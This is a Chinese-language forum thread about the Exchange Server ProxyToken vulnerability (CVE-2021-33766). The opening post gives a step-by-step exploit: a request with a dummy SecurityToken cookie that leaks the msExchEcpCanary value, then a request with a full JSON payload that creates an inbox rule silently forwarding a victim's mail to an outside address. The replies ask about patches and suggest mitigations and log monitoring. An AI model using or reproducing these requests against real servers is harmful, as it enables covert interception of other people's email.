ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)
漏洞原因:漏洞出现在“委托身份验证”的功能中,如果前端header中存在非空的SecurityToken的Cookie时,就会直接请求后端服务,不会加载委托认证的模块(DelegatedAuthModule)。
1. 向受目标服务器请求poc泄露msExchEcpCanary
POST /ecp/test1@test.com/RulesEditor/InboxRules.svc/NewObject
...
Cookie: SecurityToken=x
...
2. 在response 500 错误的header中找到msExchEcpCanary
3. 使用 msExchEcpCanary 值代入,请求设置转发规则
POST /ecp/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=$token
...
Cookie: SecurityToken=x
...
{"properties":{"ForwardTo":[{"RawIdentity":"myemail@test.com","DisplayName":"myemail","Address":"myemail@test.com","AddressOrigin":3,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"myemail@test.com"}],"Name":"test","StopProcessingRules":"true"}}
Re: ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)
感谢分享这个漏洞的技术细节,分析得很清楚。请问目前微软针对 CVE-2021-33766 是否有官方补丁或安全更新?另外,作为管理员,除了打补丁,有没有临时缓解措施(比如禁用委托身份验证或调整相关配置)可以推荐?Re: ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)
感谢分享这个漏洞细节,PROXYTOKEN (CVE-2021-33766) 的利用链写得很清晰,特别是如何绕过委托认证模块获取 msExchEcpCanary 并设置转发规则,攻击者能直接窃听邮件确实很危险。请问这个漏洞在实战中是否对 Exchange 版本有特定依赖?另外微软安全公告里有推荐什么临时缓解措施吗?Re: ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)
这个漏洞利用方式很清晰,感谢分享。从PoC看,核心就是利用未验证的SecurityToken Cookie绕过委托认证模块,再结合msExchEcpCanary来设置邮件转发规则,实现窃听。建议所有Exchange Server管理员立即检查补丁状态(微软已在7月安全更新修复此漏洞),并留意日志中是否有异常的/ecp/RulesEditor请求,特别是带SecurityToken cookie的行为。如果还未打补丁,临时禁用ECP外部访问或限制来源IP也是缓解措施。
页:
[1]